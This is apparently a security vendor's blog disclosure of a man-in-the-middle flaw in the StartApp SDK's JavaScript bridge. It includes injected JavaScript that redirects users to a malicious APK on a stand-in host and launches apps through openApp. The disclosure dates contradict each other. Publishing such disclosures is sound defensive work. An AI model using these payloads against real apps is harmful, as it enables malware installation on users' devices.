mobile_threat_blog_icon

Mobile Threat Blog

  • Mobile
    Security Insights
  • Mobile
    Threat Research
  • Mobile
    Security Tips
Share

Javascript bridges let mobile app developers open a new path for their app to be controlled via a remote server. By using a Javascript bridge (i.e., JavascriptInterface), an app’s internal functions can be invoked by downloading and running Javascript from a remote website. However, when these connections are not protected, that path is vulnerable to Man-in-the-Middle (MITM) attacks. If an attacker can intercept, modify, or inject malicious JS code, the Javascript bridge methods could use the app’s own native code to leak data or compromise the device. In this blog, we will give an example of how apps with an exposed Javascript bridge can be compromised via a MiTM attack to deliver a malicious payload and launch any app on a device.

The Javascript Bridge vulnerability existed in the StartApp SDK, an advertising SDK that claims to be in 40% of the top grossing apps, processing 15TB of advertising data per day. Among 15,940 apps in Appthority’s database connecting to the StartApp server, we found a total of 86 apps with exposed Javascript bridge connections, where 67 of them are still present on Google Play with up to 175 million downloads. Affected apps are also present in 7% of our customer enterprise environments.

The apps using the StartApp SDK communicate with the servers at startappservice.com and startappexchange.com without HTTPS. Thus, these connections are vulnerable to a MITM attack. Moreover, the SDK contains Javascript bridge methods named “externalLinks” and “openApp” under the com.startapp.android.publish.JSInterface class shown in the following code:

First, to launch a MITM attack, an attacker may set up a malicious Wi-Fi network in a public place, such as an airport or coffee shop. The attacker can now intercept connections from the StartApp SDK since they are not encrypted, and inject phishing attacks into  the vulnerable app as shown in the video below:

The attacker can then redirect the user to any malicious app. There are two ways in which users can be redirected using the Javascript bridge vulnerability of the StartApp SDK: a malicious app on the official Play Store,

window.location.replace(“market://details?id=com.malicious.app.package.name”);

or a link containing a malicious app

startappwall.externalLinks(“http://malicious.url/com.malicious.app.package.name.apk”);

Once the user installs the malicious payload, it can be launched at any time from the app containing the StartApp SDK using the “openApp” method. This malicious payload can be malware, a trojan, or adware, and perform any malicious behaviors that an attacker wants. Note that the remote MITM attacker can also launch many system apps, as shown below, including Gmail, Photo Gallery, Camera and Calendar on the devices using the Javascript Bridge.

<script type = “text/JavaScript”>

   function Attack() {

       startappwall.openApp(“”, “com.malicious.app.package.name”, “”);

       startappwall.openApp(“”, “com.android.vending”, “”); //Launch Google Play

       startappwall.openApp(“”, “com.google.android.gm, “”); //Launch Gmail

       startappwall.openApp(“”, “com.google.android.GoogleCamera”, “”); //Launch Camera

       startappwall.openApp(“”, “com.google.android.calendar”, “”); //Launch Calendar

       startappwall.openApp(“”, “com.android.gallery3d”, “”); //Launch Photo Gallery

   }

</script>

MITM attacks can happen whenever an app’s network connection isn’t encrypted. In this case, these attacks are particularly concerning because the native code and functionality of an app are exposed using an interface designed for scripting and automated action.

Recommendations

  • Only use apps that use strong encryption
  • Do not install unknown apps even if they are redirected from an existing app, only install apps from trusted app stores such as Google Play and the Apple App Store
  • Avoid connecting to untrusted WiFi networks, such as public networks in airports and coffee shops
  • Appthority customers are automatically protected. Appthority MTP detects MITM attacks, lets users identify and remediate apps with unencrypted connections, and detect sideloaded apps.

Disclosure: Appthority reported this issue to StartApp on 21 Dec 2017. StartApp has been very responsive in fixing this vulnerability and has informed Appthority that it was fixed on 20 Jan 2017.

 

Back